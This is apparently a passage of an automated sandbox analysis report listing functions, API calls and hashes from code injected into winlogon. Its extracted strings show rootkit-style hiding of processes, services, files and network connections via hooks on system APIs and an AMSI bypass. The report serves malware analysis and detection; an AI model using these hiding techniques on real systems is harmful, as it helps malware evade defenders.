                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641805
                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC641840
                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
                                                                    • Part of subcall function 00000225DC641628: RegOpenKeyExW.KERNELBASE ref: 00000225DC64187B
                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
                                                                    • Part of subcall function 00000225DC641628: RegCloseKey.KERNELBASE ref: 00000225DC6418A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 948135145-0
                                                                  • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction ID: 76bb7eedacbd5859dbe052eab2fde45565dd295a6020b4ef6d0efc5088b35558
                                                                  • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction Fuzzy Hash: FE312B5971CE21B3FB549BAED55839A33A4AB84BC6F04D0A19E0BC77E5EF34C450C250
                                                                  Function 00000225DC67DAFC Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 317 225dc67dafc-225dc67db0b 318 225dc67db0d-225dc67db19 317->318 319 225dc67db1b-225dc67db2b 317->319 318->319 320 225dc67db5e-225dc67db69 call 225dc67dadc 318->320 321 225dc67db42-225dc67db5a HeapAlloc 319->321 326 225dc67db6b-225dc67db70 320->326 322 225dc67db2d-225dc67db34 call 225dc680b50 321->322 323 225dc67db5c 321->323 322->320 329 225dc67db36-225dc67db40 call 225dc67bc8c 322->329 323->326 329->320 329->321
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00000225DC67D432,?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67DB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 4292702814-0
                                                                  • Opcode ID: eccdd21bcd0f5f67a7d4aa425ad47f9ef9ee03f6fd3ee1dab1865530e317391c
                                                                  • Instruction ID: 910fec881038d3e959c5cbd36d64231f1f330e05cf4666e0bbaa78b85f6841b8
                                                                  • Opcode Fuzzy Hash: eccdd21bcd0f5f67a7d4aa425ad47f9ef9ee03f6fd3ee1dab1865530e317391c
                                                                  • Instruction Fuzzy Hash: 3AF0309D301E24A1FE559BED955D3A552949F89F82F4CCC304D0A8BBC2EE3DC4C9C254

                                                                  Non-executed Functions

                                                                  Function 00000225DC672BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                  • API String ID: 2119608203-3850299575
                                                                  • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction ID: ce62792369046bd4a70554c70a422cbbe4044552d12490b17b477eb1b2c5f5a3
                                                                  • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction Fuzzy Hash: E3B1B17A210EA0E2EB668FADD5087A9A3A4FB44B86F44D916EE4953BD4DF34CC41C740
                                                                  Function 00000225DC642BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                  • API String ID: 2119608203-3850299575
                                                                  • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction ID: b73a31797632136bb9ee07bd0a057a1df3d581b16511b2f44c226dca76c5927e
                                                                  • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction Fuzzy Hash: 6CB1A57A21CEA0A1EBA69FEDD408799B3A4F744B86F64D056EE0A53794DF34CC41C340
                                                                  Function 00000225DC6781C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 3140674995-0
                                                                  • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction ID: f385fca171912b8a282d347bf93c3e0a6e4a279df09b91b5ef974fa9411efd51
                                                                  • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction Fuzzy Hash: F8314C76204F909AEB608FA4E8543ED7360F788746F84852ADB4E57B99DF38C648C710
                                                                  Function 00000225DC6481C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 3140674995-0
                                                                  • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction ID: 471f790d7621a760121cfd2544642bdc87453e522d55ac33a6ee3fd36c7b4cc6
                                                                  • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction Fuzzy Hash: 34316D76218F90DAEB608FA4E8543EE7364F788749F44812ADB4E47B99DF38C648C710
                                                                  Function 00000225DC67D6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 1239891234-0
                                                                  • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction ID: 49bd029eac69f0a0934ead3ec5209e459d91f2263c268eeeb221ac77c1a5fc9f
                                                                  • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction Fuzzy Hash: 8B31923A214F9096EB60CFA9E8443DE73A4F788795F504526EB8D47B98DF38C549CB00
                                                                  Function 00000225DC64D6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 1239891234-0
                                                                  • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction ID: 1ee8b7da3a1ca6efd31af0da14551b6eac32b1645751b8169b469f92989e0ca2
                                                                  • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction Fuzzy Hash: 6B31863A218F9096DB60DFA9E8443DE73A4F789795F504116EB9E43B98DF38C145CB00
                                                                  Function 00000225DC671628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442
                                                                  • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction ID: 6f5e9873abe6b859c859981dc7bb1a2d7ad2eb1f0a69fd75e1d6ad85cbe13365
                                                                  • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction Fuzzy Hash: C9713F7A310E21A5EB10DFA9E89879D33B4FB84B8AF409512DE4E47BA9DF38C444C745
                                                                  Function 00000225DC671D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 00000225DC671D4B
                                                                    • Part of subcall function 00000225DC6720C4: GetModuleHandleA.KERNEL32(?,?,?,00000225DC671D7D), ref: 00000225DC6720DC
                                                                    • Part of subcall function 00000225DC6720C4: GetProcAddress.KERNEL32(?,?,?,00000225DC671D7D), ref: 00000225DC6720ED
                                                                    • Part of subcall function 00000225DC675F60: GetCurrentThreadId.KERNEL32 ref: 00000225DC675F9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                  • API String ID: 4175298099-4225371247
                                                                  • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction ID: 7d9e9410253057828c97164bbf76050dc552e1cbcff0ece76988849bd7b629c7
                                                                  • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction Fuzzy Hash: A84184AC100D6BF0EA06EFDDE85DAD42325BB40B46F80CA13D5195B5F5AE78868EC361
                                                                  Function 00000225DC641D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 00000225DC641D4B
                                                                    • Part of subcall function 00000225DC6420C4: GetModuleHandleA.KERNEL32(?,?,?,00000225DC641D7D), ref: 00000225DC6420DC
                                                                    • Part of subcall function 00000225DC6420C4: GetProcAddress.KERNEL32(?,?,?,00000225DC641D7D), ref: 00000225DC6420ED
                                                                    • Part of subcall function 00000225DC645F60: GetCurrentThreadId.KERNEL32 ref: 00000225DC645F9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                  • API String ID: 4175298099-4225371247
                                                                  • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction ID: fb1bb4444b8dde758afb32b5cfceb91b3a49fcd79a0ac272923c45658421d9c1
                                                                  • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction Fuzzy Hash: D041ECAC118DAAB0EB0ADFDDE9596D43365B740B4BFA0C093951A031B5AF78C28DC351
                                                                  Function 00000225DC6712BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction ID: 741972622163cab60b3485e42464ebd315fc6a01a3b4811f7fd075501a189d4f
                                                                  • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction Fuzzy Hash: 0C515076200F9496E754CFAAE44C35AB7A1FB88F9AF448125DB4A07B99DF3CC059C701
                                                                  Function 00000225DC6412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction ID: 58d8987738939347865e893f24a470ae572fca13a5e588c09a8a4faeb700f7ff
                                                                  • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction Fuzzy Hash: 49514176214F9496E764CFAAE44C36AB7A1F788F9AF148124DE4A07758DF3CC049CB00
                                                                  Function 00000225DC616D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: 9a5e6bad34697a349fda0213b2663d6fdd038587db02b0e830b2026ac901264e
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 1181266D616F71AAFF60DBED984D35962D0EBA5787F04C025AB0943796EF38C846CB00
                                                                  Function 00000225DC67D258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D267
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D2EC
                                                                  • SetLastError.KERNEL32(?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,00000225DC67F0FC,?,?,?,?,00000225DC67C3CF,?,?,?,?,?,00000225DC677EE0), ref: 00000225DC67D35C
                                                                    • Part of subcall function 00000225DC67DAFC: HeapAlloc.KERNEL32(?,?,00000000,00000225DC67D432,?,?,?,00000225DC67DAE5,?,?,?,?,00000225DC67DBA8), ref: 00000225DC67DB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D384
                                                                    • Part of subcall function 00000225DC67DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC67643A), ref: 00000225DC67DB8A
                                                                    • Part of subcall function 00000225DC67DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC67643A), ref: 00000225DC67DB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC680E9B,?,?,?,00000225DC68088C,?,?,?,00000225DC67CC7F), ref: 00000225DC67D3A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
